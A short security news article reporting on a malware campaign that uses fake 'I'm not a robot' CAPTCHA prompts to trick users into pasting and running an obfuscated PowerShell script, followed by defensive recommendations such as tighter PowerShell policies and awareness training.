Fake CAPTCHA Lures Users Into Running Malware Code

A new malware campaign is leveraging fake browser verification prompts to trick users into executing malicious code, cybersecurity researchers have found. The attack mimics Google’s “I’m not a robot” CAPTCHA system, but instead of clicking images, users are instructed to perform keyboard commands such as pressing Windows + R, Ctrl + V, and Enter. Unbeknownst to them, this sequence triggers a PowerShell script copied to their clipboard through embedded JavaScript.

The malicious payload uses multiple obfuscation techniques, including base64 encoding and string manipulation, to evade detection. Once executed, the script downloads additional malware from remote servers, often employing fileless attack methods that run entirely in memory. The malware uses legitimate Windows processes to maintain persistence, bypassing traditional antivirus defenses.

Security experts recommend disabling automatic clipboard access, tightening PowerShell execution policies, and using advanced endpoint detection tools to monitor suspicious activity. Awareness training is also critical to help users recognize deceptive prompts mimicking legitimate browser security checks.